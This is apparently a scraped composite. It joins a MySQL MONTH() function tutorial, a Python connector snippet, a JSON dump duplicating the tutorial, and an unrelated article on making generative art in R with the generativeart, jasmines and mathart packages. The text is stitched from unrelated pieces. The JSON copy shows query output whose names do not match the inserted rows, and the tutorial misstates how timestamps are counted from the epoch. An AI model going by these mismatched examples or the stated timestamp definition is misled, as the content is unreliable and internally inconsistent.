+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT MONTH('1789-00-07');
+---------------------+
| MONTH('1789-00-07') |
+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)

If you pass an empty string or a non-string value as an argument, this function returns NULL.

mysql> SELECT MONTH('');
+-----------+
| MONTH('') |
+-----------+
|      NULL |
+-----------+
1 row in set, 1 warning (0.00 sec)

mysql> SELECT MONTH(1990-11-11);
+-------------------+
| MONTH(1990-11-11) |
+-------------------+
|              NULL |
+-------------------+
1 row in set, 1 warning (0.00 sec)

We can also pass a date-time expression as an argument to this function −

mysql> SELECT MONTH('2015-09-05 09:40:45.2300');
+-----------------------------------+
| MONTH('2015-09-05 09:40:45.2300') |
+-----------------------------------+
|                                 9 |
+-----------------------------------+
1 row in set (0.00 sec)

In the following example we are retrieving the month (number) from the current date −

mysql> SELECT MONTH(CURDATE());
+------------------+
| MONTH(CURDATE()) |
+------------------+
|                7 |
+------------------+
1 row in set (0.00 sec)

In the following example we are retrieving the month (number) from the current timestamp −

mysql> SELECT MONTH(CURRENT_TIMESTAMP());
+----------------------------+
| MONTH(CURRENT_TIMESTAMP()) |
+----------------------------+
|                          7 |
+----------------------------+
1 row in set (0.00 sec)

You can also pass a column name as an argument to this function.
Let us create a table with the name MyPlayers in a MySQL database using the CREATE statement as shown below −

mysql> CREATE TABLE MyPlayers(
   ID INT,
   First_Name VARCHAR(255),
   Last_Name VARCHAR(255),
   Date_Of_Birth date,
   Place_Of_Birth VARCHAR(255),
   Country VARCHAR(255),
   PRIMARY KEY (ID)
);

Now, we will insert 7 records in the MyPlayers table using INSERT statements −

mysql> insert into MyPlayers values(1, 'Shikhar', 'Dhawan', DATE('1981-12-05'), 'Delhi', 'India');
mysql> insert into MyPlayers values(2, 'Jonathan', 'Trott', DATE('1981-04-22'), 'CapeTown', 'SouthAfrica');
mysql> insert into MyPlayers values(3, 'Kumara', 'Sangakkara', DATE('1977-10-27'), 'Matale', 'Srilanka');
mysql> insert into MyPlayers values(4, 'Virat', 'Kohli', DATE('1988-11-05'), 'Delhi', 'India');
mysql> insert into MyPlayers values(5, 'Rohit', 'Sharma', DATE('1987-04-30'), 'Nagpur', 'India');
mysql> insert into MyPlayers values(6, 'Ravindra', 'Jadeja', DATE('1988-12-06'), 'Nagpur', 'India');
mysql> insert into MyPlayers values(7, 'James', 'Anderson', DATE('1982-06-30'), 'Burnley', 'England');

Following query retrieves and prints the month (number) from all the entities of the Date_Of_Birth column of the table MyPlayers −

mysql> SELECT First_Name, Last_Name, Date_Of_Birth, Country, MONTH(Date_Of_Birth) FROM MyPlayers;
+------------+------------+---------------+-------------+----------------------+
| First_Name | Last_Name  | Date_Of_Birth | Country     | MONTH(Date_Of_Birth) |
+------------+------------+---------------+-------------+----------------------+
| Shikhar    | Dhawan     | 1981-12-05    | India       |                   12 |
| Jonathan   | Trott      | 1981-04-22    | SouthAfrica |                    4 |
| Kumara     | Sangakkara | 1977-10-27    | Srilanka    |                   10 |
| Virat      | Kohli      | 1988-11-05    | India       |                   11 |
| Rohit      | Sharma     | 1987-04-30    | India       |                    4 |
| Ravindra   | Jadeja     | 1988-12-06    | India       |                   12 |
| James      | Anderson   | 1982-06-30    | England     |                    6 |
+------------+------------+---------------+-------------+----------------------+
7 rows in set (0.00 sec)

Suppose we have created a table named dispatches_data with 5 records in it using the following queries −

mysql> CREATE TABLE dispatches_data(
   ProductName VARCHAR(255),
   CustomerName VARCHAR(255),
   DispatchTimeStamp timestamp,
   Price INT,
   Location VARCHAR(255)
);
insert into dispatches_data values('Key-Board', 'Raja', TIMESTAMP('2019-05-04', '15:02:45'), 7000, 'Hyderabad');
insert into dispatches_data values('Earphones', 'Roja', TIMESTAMP('2019-06-26', '14:13:12'), 2000, 'Vishakhapatnam');
insert into dispatches_data values('Mouse', 'Puja', TIMESTAMP('2019-12-07', '07:50:37'), 3000, 'Vijayawada');
insert into dispatches_data values('Mobile', 'Vanaja', TIMESTAMP('2018-03-21', '16:00:45'), 9000, 'Chennai');
insert into dispatches_data values('Headset', 'Jalaja', TIMESTAMP('2018-12-30', '10:49:27'), 6000, 'Goa');

Following query retrieves the month values (numbers) from the DispatchTimeStamp column −

mysql> SELECT ProductName, CustomerName, DispatchTimeStamp, Price, MONTH(DispatchTimeStamp) FROM dispatches_data;
+-------------+--------------+---------------------+-------+--------------------------+
| ProductName | CustomerName | DispatchTimeStamp   | Price | MONTH(DispatchTimeStamp) |
+-------------+--------------+---------------------+-------+--------------------------+
| Key-Board   | Raja         | 2019-05-04 15:02:45 |  7000 |                        5 |
| Earphones   | Roja         | 2019-06-26 14:13:12 |  2000 |                        6 |
| Mouse       | Puja         | 2019-12-07 07:50:37 |  3000 |                       12 |
| Mobile      | Vanaja       | 2018-03-21 16:00:45 |  9000 |                        3 |
| Headset     | Jalaja       | 2018-12-30 10:49:27 |  6000 |                       12 |
+-------------+--------------+---------------------+-------+--------------------------+
5 rows in set (0.00 sec)

Suppose we have created a table named SubscriberDetails with 5 records in it using the following queries −

mysql> CREATE TABLE SubscriberDetails (
   SubscriberName VARCHAR(255),
   PackageName VARCHAR(255),
   SubscriptionTimeStamp timestamp
);
insert into SubscriberDetails values('Raja', 'Premium', TimeStamp('2020-10-21 20:53:49'));
insert into SubscriberDetails values('Roja', 'Basic', TimeStamp('2020-11-26 10:13:19'));
insert into SubscriberDetails values('Puja', 'Moderate', TimeStamp('2021-03-07 05:43:20'));
insert into SubscriberDetails values('Vanaja', 'Basic', TimeStamp('2021-02-21 16:36:39'));
insert into SubscriberDetails values('Jalaja', 'Premium', TimeStamp('2021-01-30 12:45:45'));

Following query retrieves and displays the subscription month for all the records −

mysql> SELECT SubscriberName, PackageName, SubscriptionTimeStamp, MONTH(SubscriptionTimeStamp) FROM SubscriberDetails;
+----------------+-------------+-----------------------+------------------------------+
| SubscriberName | PackageName | SubscriptionTimeStamp | MONTH(SubscriptionTimeStamp) |
+----------------+-------------+-----------------------+------------------------------+
| Raja           | Premium     | 2020-10-21 20:53:49   |                           10 |
| Roja           | Basic       | 2020-11-26 10:13:19   |                           11 |
| Puja           | Moderate    | 2021-03-07 05:43:20   |                            3 |
| Vanaja         | Basic       | 2021-02-21 16:36:39   |                            2 |
| Jalaja         | Premium     | 2021-01-30 12:45:45   |                            1 |
+----------------+-------------+-----------------------+------------------------------+
5 rows in set (0.00 sec)
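The same MONTH() queries can also be issued from application code. A minimal Python sketch using the mysql-connector-python package (the connection details are placeholders to replace with your own, and the MyPlayers table created above is assumed to exist):

import mysql.connector

# placeholder credentials - replace with your own server details
conn = mysql.connector.connect(host="localhost", user="root",
                               password="password", database="test")
cursor = conn.cursor()
cursor.execute("SELECT First_Name, MONTH(Date_Of_Birth) FROM MyPlayers")
for first_name, birth_month in cursor.fetchall():
    print(first_name, birth_month)
conn.close()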
[ { "code": null, "e": 2664, "s": 2333, "text": "The DATE, DATETIME and TIMESTAMP datatypes in MySQL are used to store the date, date and time, time stamp values respectively. Where a time stamp is a numerical value representing the number of milliseconds from '1970-01-01 00:00:01' UTC (epoch) to the specified time. MySQL provides a set of functions to manipulate these values." }, { "code": null, "e": 2883, "s": 2664, "text": "The MYSQL MONTH() function is used to retrieve and return the MONTH of the given date or, date time expression. This function returns a numerical value ranging from 1 to 12 representing the month (January to December)." }, { "code": null, "e": 2931, "s": 2883, "text": "Following is the syntax of the above function –" }, { "code": null, "e": 2945, "s": 2931, "text": "MONTH(date);\n" }, { "code": null, "e": 3018, "s": 2945, "text": "Where, date is the date value from which you need to retrieve the month." }, { "code": null, "e": 3085, "s": 3018, "text": "Following example demonstrates the usage of the MONTH() function –" }, { "code": null, "e": 3264, "s": 3085, "text": "mysql> SELECT MONTH('2019-05-25');\n+---------------------+\n| MONTH('2019-05-25') |\n+---------------------+\n| 5 |\n+---------------------+\n1 row in set (0.18 sec)" }, { "code": null, "e": 3312, "s": 3264, "text": "Following is another example of this function –" }, { "code": null, "e": 3491, "s": 3312, "text": "mysql> SELECT MONTH('2008-09-17');\n+---------------------+\n| MONTH('2008-09-17') |\n+---------------------+\n| 9 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 3559, "s": 3491, "text": "If the month value in the given date is 0 this function returns 0 —" }, { "code": null, "e": 3917, "s": 3559, "text": "mysql> SELECT MONTH('2017-00-00');\n+---------------------+\n| MONTH('2017-00-00') |\n+---------------------+\n| 0|\n+---------------------+\n1 row in set (0.00 sec)\nmysql> SELECT MONTH('1789-00-07');\n+---------------------+\n| MONTH('1789-00-07') |\n+---------------------+\n| 0 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4010, "s": 3917, "text": "If you pass an empty string or a non-string value as an argument this function returns NULL." 
}, { "code": null, "e": 4318, "s": 4010, "text": "mysql> SELECT MONTH('');\n+-----------+\n| MONTH('') |\n+-----------+\n| NULL |\n+-----------+\n1 row in set, 1 warning (0.00 sec)\nmysql> SELECT MONTH(1990-11-11);\n+-------------------+\n| MONTH(1990-11-11) |\n+-------------------+\n| NULL |\n+-------------------+\n1 row in set, 1 warning (0.00 sec)" }, { "code": null, "e": 4394, "s": 4318, "text": "We can also pass the date-time expression as an argument to this function –" }, { "code": null, "e": 4657, "s": 4394, "text": "mysql> SELECT MONTH('2015-09-05 09:40:45.2300');\n+-----------------------------------+\n| MONTH('2015-09-05 09:40:45.2300') |\n+-----------------------------------+\n| 9 |\n+-----------------------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4743, "s": 4657, "text": "In the following example we are retrieving the month (number) from the current date —" }, { "code": null, "e": 4904, "s": 4743, "text": "mysql> SELECT MONTH(CURDATE());\n+------------------+\n| MONTH(CURDATE()) |\n+------------------+\n| 7 |\n+------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 4995, "s": 4904, "text": "In the following example we are retrieving the month (number) from the current timestamp —" }, { "code": null, "e": 5216, "s": 4995, "text": "mysql> SELECT MONTH(CURRENT_TIMESTAMP());\n+----------------------------+\n| MONTH(CURRENT_TIMESTAMP()) |\n+----------------------------+\n| 7 |\n+----------------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 5383, "s": 5216, "text": "You can also pass the column name as an argument to this function. Let us create a table with name MyPlayers in MySQL database using CREATE statement as shown below –" }, { "code": null, "e": 6354, "s": 5383, "text": "mysql> CREATE TABLE MyPlayers(\n\tID INT,\n\tFirst_Name VARCHAR(255),\n\tLast_Name VARCHAR(255),\n\tDate_Of_Birth date,\n\tPlace_Of_Birth VARCHAR(255),\n\tCountry VARCHAR(255),\n\tPRIMARY KEY (ID)\n);\nNow, we will insert 7 records in MyPlayers table using INSERT statements:\nmysql> insert into MyPlayers values(1, 'Shikhar', 'Dhawan', DATE('1981-12-05'), 'Delhi', 'India');\nmysql> insert into MyPlayers values(2, 'Jonathan', 'Trott', DATE('1981-04-22'), 'CapeTown', 'SouthAfrica');\nmysql> insert into MyPlayers values(3, 'Kumara', 'Sangakkara', DATE('1977-10-27'), 'Matale', 'Srilanka');\nmysql> insert into MyPlayers values(4, 'Virat', 'Kohli', DATE('1988-11-05'), 'Delhi', 'India');\nmysql> insert into MyPlayers values(5, 'Rohit', 'Sharma', DATE('1987-04-30'), 'Nagpur', 'India');\nmysql> insert into MyPlayers values(6, 'Ravindra', 'Jadeja', DATE('1988-12-06'), 'Nagpur', 'India');\nmysql> insert into MyPlayers values(7, 'James', 'Anderson', DATE('1982-06-30'), 'Burnley', 'England');" }, { "code": null, "e": 6485, "s": 6354, "text": "Following query retrieves and prints the month (number) from all the entities of the Date_Of_Birth column of the table MyPlayers —" }, { "code": null, "e": 7499, "s": 6485, "text": "mysql> SELECT First_Name, Last_Name, Date_Of_Birth, Country,\nMONTH(Date_Of_Birth) FROM MyPlayers;\n+------------+------------+---------------+-------------+----------------------+\n| First_Name | Last_Name | Date_Of_Birth | Country | MONTH(Date_Of_Birth) |\n+------------+------------+---------------+-------------+----------------------+\n| Shikhar | Dhawan | 1981-12-05 | India | 12 |\n| Jonathan | Trott | 1981-04-22 | SouthAfrica | 4 |\n| Kumara | Sangakkara | 1977-10-27 | Srilanka | 10 |\n| Virat | Kohli | 1988-11-05 | India | 11 |\n| Rohit | 
Sharma | 1987-04-30 | India | 4 |\n| Ravindra | Jadeja | 1988-12-06 | India | 12 |\n| James | Anderson | 1982-06-30 | England | 6 |\n+------------+------------+---------------+-------------+----------------------+\n7 rows in set (0.00 sec)" }, { "code": null, "e": 7604, "s": 7499, "text": "Suppose we have created a table named dispatches_data with 5 records in it using the following queries –" }, { "code": null, "e": 8325, "s": 7604, "text": "mysql> CREATE TABLE dispatches_data(\n\tProductName VARCHAR(255),\n\tCustomerName VARCHAR(255),\n\tDispatchTimeStamp timestamp,\n\tPrice INT,\n\tLocation VARCHAR(255)\n);\ninsert into dispatches_data values('Key-Board', 'Raja', TIMESTAMP('2019-05-04', '15:02:45'), 7000, 'Hyderabad');\ninsert into dispatches_data values('Earphones', 'Roja', TIMESTAMP('2019-06-26', '14:13:12'), 2000, 'Vishakhapatnam');\ninsert into dispatches_data values('Mouse', 'Puja', TIMESTAMP('2019-12-07', '07:50:37'), 3000, 'Vijayawada');\ninsert into dispatches_data values('Mobile', 'Vanaja' , TIMESTAMP ('2018-03-21', '16:00:45'), 9000, 'Chennai');\ninsert into dispatches_data values('Headset', 'Jalaja' , TIMESTAMP('2018-12-30', '10:49:27'), 6000, 'Goa');" }, { "code": null, "e": 8414, "s": 8325, "text": "Following query retrieves the month values (numbers) from the DispatchTimeStamp column —" }, { "code": null, "e": 9345, "s": 8414, "text": "mysql> SELECT ProductName, CustomerName, DispatchTimeStamp, Price,\nMONTH(DispatchTimeStamp) FROM dispatches_data;\n+-------------+--------------+---------------------+-------+--------------------------+\n| ProductName | CustomerName | DispatchTimeStamp | Price | MONTH(DispatchTimeStamp) |\n+-------------+--------------+---------------------+-------+--------------------------+\n| Key-Board | Raja | 2019-05-04 15:02:45 | 7000 | 5 |\n| Earphones | Roja | 2019-06-26 14:13:12 | 2000 | 6 |\n| Mouse | Puja | 2019-12-07 07:50:37 | 3000 | 12 |\n| Mobile | Vanaja | 2018-03-21 16:00:45 | 9000 | 3 |\n| Headset | Jalaja | 2018-12-30 10:49:27 | 6000 | 12 |\n+-------------+--------------+---------------------+-------+--------------------------+\n5 rows in set (0.00 sec)" }, { "code": null, "e": 9452, "s": 9345, "text": "Suppose we have created a table named SubscriberDetails with 5 records in it using the following queries –" }, { "code": null, "e": 10041, "s": 9452, "text": "mysql> CREATE TABLE SubscriberDetails (\n\tSubscriberName VARCHAR(255),\n\tPackageName VARCHAR(255),\n\tSubscriptionTimeStamp timestamp\n);\ninsert into SubscriberDetails values('Raja', 'Premium', TimeStamp('2020-10-21 20:53:49'));\ninsert into SubscriberDetails values('Roja', 'Basic', TimeStamp('2020-11-26 10:13:19'));\ninsert into SubscriberDetails values('Puja', 'Moderate', TimeStamp('2021-03-07 05:43:20'));\ninsert into SubscriberDetails values('Vanaja', 'Basic', TimeStamp('2021-02-21 16:36:39'));\ninsert into SubscriberDetails values('Jalaja', 'Premium', TimeStamp('2021-01-30 12:45:45'));" }, { "code": null, "e": 10125, "s": 10041, "text": "Following query retrieves and displays the subscription month for all the records —" }, { "code": null, "e": 11061, "s": 10125, "text": "mysql> SELECT SubscriberName, PackageName, SubscriptionTimeStamp,\nMONTH(SubscriptionTimeStamp) FROM SubscriberDetails;\n-----------------+-------------+-----------------------+------------------------------+\n| SubscriberName | PackageName | SubscriptionTimeStamp | MONTH(SubscriptionTimeStamp) |\n+----------------+-------------+-----------------------+------------------------------+\n| Ram | Premium | 
2020-10-21 20:53:49 | 10 |\n| Rahman | Basic | 2020-11-26 10:13:19 | 11 |\n| Robert | Moderate | 2021-03-07 05:43:20 | 3 |\n| Radha | Basic | 2021-02-21 16:36:39 | 2 |\n| Rajiya | Premium | 2021-01-30 12:45:45 | 1 |\n+----------------+-------------+-----------------------+------------------------------+\n5 rows in set (0.00 sec)" }, { "code": null, "e": 11094, "s": 11061, "text": "\n 31 Lectures \n 6 hours \n" }, { "code": null, "e": 11122, "s": 11094, "text": " Eduonix Learning Solutions" }, { "code": null, "e": 11157, "s": 11122, "text": "\n 84 Lectures \n 5.5 hours \n" }, { "code": null, "e": 11174, "s": 11157, "text": " Frahaan Hussain" }, { "code": null, "e": 11208, "s": 11174, "text": "\n 6 Lectures \n 3.5 hours \n" }, { "code": null, "e": 11243, "s": 11208, "text": " DATAhill Solutions Srinivas Reddy" }, { "code": null, "e": 11277, "s": 11243, "text": "\n 60 Lectures \n 10 hours \n" }, { "code": null, "e": 11305, "s": 11277, "text": " Vijay Kumar Parvatha Reddy" }, { "code": null, "e": 11338, "s": 11305, "text": "\n 10 Lectures \n 1 hours \n" }, { "code": null, "e": 11358, "s": 11338, "text": " Harshit Srivastava" }, { "code": null, "e": 11391, "s": 11358, "text": "\n 25 Lectures \n 4 hours \n" }, { "code": null, "e": 11409, "s": 11391, "text": " Trevoir Williams" }, { "code": null, "e": 11416, "s": 11409, "text": " Print" }, { "code": null, "e": 11427, "s": 11416, "text": " Add Notes" } ]
Getting Started with Generative Art in R | by Vít Gabrhel | Towards Data Science
Generative art represents the involvement of a human-independent system (such as an algorithm) in a creative process. Such a system is a key element within the creative process, including its outputs.

Unsurprisingly, there are many “tools” you can use if you want to delve into generative art. In case you want to have “hands-on” experience in R, there are two basic directions you can go.

If you are a person proficient in working with code, you may write your code straight away. I dare to argue that this is the way of “individual” expression, as it allows for more flexibility, and, well, freedom.

However, getting to that point takes time. Luckily, you can begin experimenting with your pieces of generative art by using one of the existing packages. Not only could it be quite rewarding, but it also works perfectly for grasping the basics of the “trade”.

In this article, I am going to present to you some of the “ready-to-use” packages for making generative art. Also, I will tap into some of the examples of using general packages or libraries to arrive at the same goal.

The first package I would like to present is called simply generativeart.

One of its key features is the way it structures the output files. In order to get the output files, you have to specify the location where they will be stored. Also, it iterates on the provided formula that doesn’t need to be supported with a seed. In this scenario, each of the outcome files is unique.

Also, it is worth mentioning that the generativeart package is well documented and easy to use.

library(generativeart) # devtools::install_github("cutterkom/generativeart")
library(ambient)
library(dplyr)

# set the paths
IMG_DIR <- "img/"
IMG_SUBDIR <- "everything/"
IMG_SUBDIR2 <- "handpicked/"
IMG_PATH <- paste0(IMG_DIR, IMG_SUBDIR)
LOGFILE_DIR <- "logfile/"
LOGFILE <- "logfile.csv"
LOGFILE_PATH <- paste0(LOGFILE_DIR, LOGFILE)

# create the directory structure
generativeart::setup_directories(IMG_DIR, IMG_SUBDIR, IMG_SUBDIR2, LOGFILE_DIR)

# include a specific formula, for example:
my_formula <- list(
  x = quote(runif(1, -1, 10) * x_i^2 - sin(y_i^2)),
  y = quote(runif(1, -1, 10) * y_i^3 - cos(x_i^2) * y_i^4)
)

# call the main function to create five images with a polar coordinate system
generativeart::generate_img(formula = my_formula,
                            nr_of_img = 5, # set the number of iterations
                            polar = TRUE,
                            filetype = "png",
                            color = "#c1a06e",
                            background_color = "#1a3657")

Danielle Navarro, the author of the Learning Statistics with R handbook, is a well-known person among psychology students. Besides her teaching and research activities at the University of Adelaide, she also released the jasmines package, a tool allowing for creating generative art in R.

This package gives you an opportunity to play with simulation parameters (e.g. grain or interaction), shapes (e.g. entity_circle or scene_discs) and their modifications (like style_ribbon) or colours (palette or alpha). And noise, linked to the ambient library:

library(dplyr)    # or install.packages("dplyr") first
library(jasmines) # or devtools::install_github("djnavarro/jasmines")

p0 <- use_seed(100) %>% # set the seed of R's random number generator for reproducibility
  scene_discs(
    rings = 10, points = 50000, size = 50
  ) %>%
  mutate(ind = 1:n()) %>%
  unfold_warp(
    iterations = 10,
    scale = .5,
    output = "layer"
  ) %>%
  unfold_tempest(
    iterations = 5,
    scale = .01
  ) %>%
  style_ribbon(
    color = "#E0542E",
    colour = "ind",
    alpha = c(1, 1),
    background = "#4D7186"
  )

ggsave("p0.png", p0, width = 20, height = 20, units = "in")

The mathart package wraps many commonly used algorithms into functions. One such example is the nearest-neighbour graph, a visualisation of the k-d tree, a data structure for organising points in a multidimensional space:

library(mathart) # devtools::install_github("marcusvolz/mathart")
library(ggart)   # devtools::install_github("marcusvolz/ggart")
library(ggforce)
library(Rcpp)
library(tidyverse)

points <- mathart::points
result <- kdtree(points)

p1 <- ggplot() +
  geom_segment(aes(x, y, xend = xend, yend = yend), result) +
  coord_equal() +
  xlim(0, 10000) +
  ylim(0, 10000) +
  theme_blankcanvas(bg_col = "#fafafa", margin_cm = 0)

# save plot
ggsave("kdtree.png", p1, width = 20, height = 20, units = "in")

mathart is a well-documented package. This fact widens the scope for experimenting. Maybe more importantly, by looking “under the hood”, the package improves understanding of data simulation.

In many instances, the previously mentioned packages build on more generally used packages such as magrittr (the pipe operator comes in handy even in art creation), ggplot2, dplyr, or purrr.

The k-d tree from the mathart package is no different. As we can see from the example of Marcus Volz, the original k-d tree algorithm can be tweaked using even base R:

# Metropolis: Generative city visualisations

# Packages
library(ggart)
library(tidyverse)
library(tweenr)
library(viridis)

# Make reproducible
set.seed(10001)

# Parameters
n <- 10000            # iterations
r <- 75               # neighbourhood
width <- 10000        # canvas width
height <- 10000       # canvas height
delta <- 2 * pi / 180 # angle direction noise
p_branch <- 0.1       # probability of branching
initial_pts <- 3      # number of initial points
nframes <- 500        # number of tweenr frames

# Initialise data frames
points <- data.frame(x = numeric(n), y = numeric(n), dir = numeric(n), level = integer(n))
edges <- data.frame(x = numeric(n), y = numeric(n), xend = numeric(n), yend = numeric(n), level = integer(n))

if(initial_pts > 1) {
  i <- 2
  while(i <= initial_pts) {
    points[i, ] <- c(runif(1, 0, width), runif(1, 0, height), runif(1, -2*pi, 2*pi), 1)
    i <- i + 1
  }
}

t0 <- Sys.time()

# Main loop ----
i <- initial_pts + 1
while (i <= n) {
  valid <- FALSE
  while (!valid) {
    random_point <- sample_n(points[seq(1:(i-1)), ], 1) # Pick a point at random
    branch <- ifelse(runif(1, 0, 1) <= p_branch, TRUE, FALSE)
    alpha <- random_point$dir[1] + runif(1, -(delta), delta) +
      (branch * (ifelse(runif(1, 0, 1) < 0.5, -1, 1) * pi/2))
    # Create directional vector
    v <- c(cos(alpha), sin(alpha)) * r *
      (1 + 1 / ifelse(branch, random_point$level[1]+1, random_point$level[1]))
    xj <- random_point$x[1] + v[1]
    yj <- random_point$y[1] + v[2]
    lvl <- random_point$level[1]
    lvl_new <- ifelse(branch, lvl+1, lvl)
    if(xj < 0 | xj > width | yj < 0 | yj > height) {
      next
    }
    points_dist <- points %>% mutate(d = sqrt((xj - x)^2 + (yj - y)^2))
    if (min(points_dist$d) >= 1 * r) {
      points[i, ] <- c(xj, yj, alpha, lvl_new)
      edges[i, ] <- c(xj, yj, random_point$x[1], random_point$y[1], lvl_new)
      # Add a building if possible
      building <- 1
      valid <- TRUE
    }
  }
  i <- i + 1
  print(i)
}

edges <- edges %>% filter(level > 0)

sand <- data.frame(alpha = numeric(0), x = numeric(0), y = numeric(0))
perp <- data.frame(x = numeric(0), y = numeric(0), xend = numeric(0), yend = numeric(0))

# Create plot
p2 <- ggplot() +
  geom_segment(aes(x, y, xend = xend, yend = yend, size = -level), edges, lineend = "round") +
  #geom_segment(aes(x, y, xend = xend, yend = yend), perp, lineend = "round", alpha = 0.15) +
  #geom_point(aes(x, y), points) +
  #geom_point(aes(x, y), sand, size = 0.05, alpha = 0.05, colour = "black") +
  xlim(0, 10000) +
  ylim(0, 10000) +
  coord_equal() +
  scale_size_continuous(range = c(0.5, 0.5)) +
  #scale_color_viridis() +
  theme_blankcanvas(bg_col = "#fafafa", margin_cm = 0)

# print plot
ggsave("plot007w.png", p2, width = 20, height = 20, units = "cm", dpi = 300)

You don’t need to stop here. Some time spent playing with the code can easily end up as your own distinct wall poster.

Generative art demonstrates that code can be beautiful. If you are still not persuaded, go and see more elaborate works like these.

Not only can generative art result in something astonishing, but it also helps you to understand the code itself. Interestingly, getting to the code underlying generative art may not be as easy as in other open-source areas. Some “generative artists” conclude not to share the code used in the creative process:

“I do not share the code I use to create my pieces. The main reason for this is that I don’t think it would be beneficial to anyone. People interested in getting started with generative art would become too focused on my ideas instead of developing their own. Knowing the answer is the killer of creativity.”

Thomas Lin Pedersen, Data Imaginist

Regardless of whether we agree or not, generative art confronts us with ideas that are not that common in the world of coding.

So, what are your ideas on the matter? Do you have any favourite generative artists? Or maybe your pieces of art you would like to share? Feel free to discuss this on Twitter.

Originally published at https://www.data-must-flow.com.
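(A closing aside, not from the original article: the k-d tree that mathart visualises above is a general-purpose spatial data structure, and the same idea is available in Python. A minimal sketch using scipy:)

import numpy as np
from scipy.spatial import cKDTree

# 1000 random 2-D points, mimicking the kind of input kdtree() consumes
rng = np.random.default_rng(100)
pts = rng.uniform(0, 10000, size=(1000, 2))

tree = cKDTree(pts)
dist, idx = tree.query(pts, k=2)  # k=2: the nearest hit is the point itself
print(dist[:, 1].mean())          # average nearest-neighbour distance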
[ { "code": null, "e": 373, "s": 172, "text": "Generative art represents the involvement of a human-independent system (such as an algorithm) in a creative process. Such a system is a key element within the creative process, including its outputs." }, { "code": null, "e": 562, "s": 373, "text": "Unsurprisingly, there are many “tools” you can use if you want to delve into generative art. In case you want to have “hands-on” experience in R, there are two basic directions you can go." }, { "code": null, "e": 777, "s": 562, "text": "If you are a person proficient in working with code, you may write your code straight away. I dare to argue that this is the way of the “individual” expression as it allows for more flexibility, and, well, freedom." }, { "code": null, "e": 1037, "s": 777, "text": "However, getting to that point takes time. Luckily, you can begin experimenting with your pieces of generative art by using one of the existing packages. Not only it could be quite rewarding, but it also works perfectly for grasping the basics of the “trade”." }, { "code": null, "e": 1256, "s": 1037, "text": "In this article, I am going to present to you some of the “ready-to-use” packages for making generative art. Also, I will tap into some of the examples of using general packages or libraries to arrive at the same goal." }, { "code": null, "e": 1330, "s": 1256, "text": "The first package I would like to present is called simply generativeart." }, { "code": null, "e": 1639, "s": 1330, "text": "One of its key features is the way how it structures the output files. In order to get the output files, you have to specify the location where they will be stored. Also, it iterates on the provided formula that doesn’t need to be supported with a seed. In this scenario, each of the outcome files is unique." }, { "code": null, "e": 1735, "s": 1639, "text": "Also, it is worth mentioning that the generativeart package is well documented and easy to use." }, { "code": null, "e": 2876, "s": 1735, "text": "library(generativeart) # devtools::install_github(\"cutterkom/generativeart\")library(ambient)library(dplyr)# set the pathsIMG_DIR <- \"img/\"IMG_SUBDIR <- \"everything/\"IMG_SUBDIR2 <- \"handpicked/\"IMG_PATH <- paste0(IMG_DIR, IMG_SUBDIR)LOGFILE_DIR <- \"logfile/\"LOGFILE <- \"logfile.csv\"LOGFILE_PATH <- paste0(LOGFILE_DIR, LOGFILE)# create the directory structuregenerativeart::setup_directories(IMG_DIR, IMG_SUBDIR, IMG_SUBDIR2, LOGFILE_DIR)# include a specific formula, for example:my_formula <- list( x = quote(runif(1, -1, 10) * x_i^2 - sin(y_i^2)), y = quote(runif(1, -1, 10) * y_i^3 - cos(x_i^2) * y_i^4))# call the main function to create five images with a polar coordinate systemgenerativeart::generate_img(formula = my_formula, nr_of_img = 5, # set the number of iterations polar = TRUE, filetype = \"png\", color = \"#c1a06e\", background_color = \"#1a3657\")" }, { "code": null, "e": 3026, "s": 2876, "text": "Danielle Navarro, the author of the Learning Statistics with R Learning Statistics with R handbook, is a well-known person among psychology students." }, { "code": null, "e": 3194, "s": 3026, "text": "Besides her teaching and research activities at the University of Adelaide, she also released the jasmines package, a tool allowing for creating a generative art in R." }, { "code": null, "e": 3456, "s": 3194, "text": "This package gives you an opportunity to play with simulation parameters (e.g. grain or interaction), shapes (e.g. 
entity_circle or scene_discs) and their modifications (like style_ribbon) or colours (palette or alpha). And noise, linked to the ambient library:" }, { "code": null, "e": 4124, "s": 3456, "text": "library(dplyr) # or install.packages(\"dplyr\") firstlibrary(jasmines) # or devtools::install_github(\"djnavarro/jasmines\")p0 <- use_seed(100) %>% # Set the seed of R‘s random number generator, which is useful for creating simulations or random objects that can be reproduced. scene_discs( rings = 10, points = 50000, size = 50 ) %>% mutate(ind = 1:n()) %>% unfold_warp( iterations = 10, scale = .5, output = \"layer\" ) %>% unfold_tempest( iterations = 5, scale = .01 ) %>% style_ribbon( color = \"#E0542E\", colour = \"ind\", alpha = c(1,1), background = \"#4D7186\" )ggsave(\"p0.png\", p0, width = 20, height = 20, units = \"in\")" }, { "code": null, "e": 4338, "s": 4124, "text": "The mathart package wraps many commonly used algorithms into functions. One of such examples is the nearest neighbour graph, a visualisation of the k-d tree, a data structuring procedure of multidimensional space:" }, { "code": null, "e": 4818, "s": 4338, "text": "library(mathart) # devtools::install_github(\"marcusvolz/mathart\")library(ggart) # devtools::install_github(\"marcusvolz/ggart\")library(ggforce)library(Rcpp)library(tidyverse)points <- mathart::pointsresult <- kdtree(points)p1 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend), result) + coord_equal() + xlim(0, 10000) + ylim(0, 10000) + theme_blankcanvas(bg_col = \"#fafafa\", margin_cm = 0)# save plotggsave(\"kdtree.png\", p1, width = 20, height = 20, units = \"in\")" }, { "code": null, "e": 5010, "s": 4818, "text": "mathart is a well-documented package. This fact widens the scope for experimenting. Maybe more importantly, by looking “under the hood”, the package improves understanding of data simulation." }, { "code": null, "e": 5202, "s": 5010, "text": "In many instances, previously mentioned packages built on more generally used packages such as magritr (the pipeline operator comes in handy even in the art creation), ggplot, dplyr, or purr." }, { "code": null, "e": 5370, "s": 5202, "text": "The k-d tree from the mathart package is no different. 
